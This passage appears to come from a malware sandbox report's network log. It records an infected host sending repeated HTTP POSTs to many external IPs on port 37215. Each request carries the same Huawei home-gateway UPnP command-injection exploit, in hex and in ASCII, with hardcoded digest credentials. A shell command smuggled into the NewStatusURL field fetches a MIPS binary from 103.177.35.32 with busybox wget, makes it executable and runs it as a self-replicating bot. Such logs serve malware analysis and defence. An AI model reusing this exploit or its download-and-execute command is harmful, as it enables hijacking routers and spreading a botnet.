                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        686192.168.2.2357086157.175.254.6737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.496759892 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        687192.168.2.2357156157.47.123.5937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.496793985 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        688192.168.2.2347408157.121.117.5737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.497186899 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        689192.168.2.2339488157.60.46.9337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.497256041 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        690192.168.2.2356448197.133.206.6537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.497790098 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        691192.168.2.2332914197.173.117.4537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.510246038 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        692192.168.2.2338594197.26.164.25237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.510253906 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        693192.168.2.234893641.111.176.5337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.510265112 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        694192.168.2.2338798108.162.236.9737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.510304928 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        695192.168.2.234212441.65.106.23237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.510642052 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
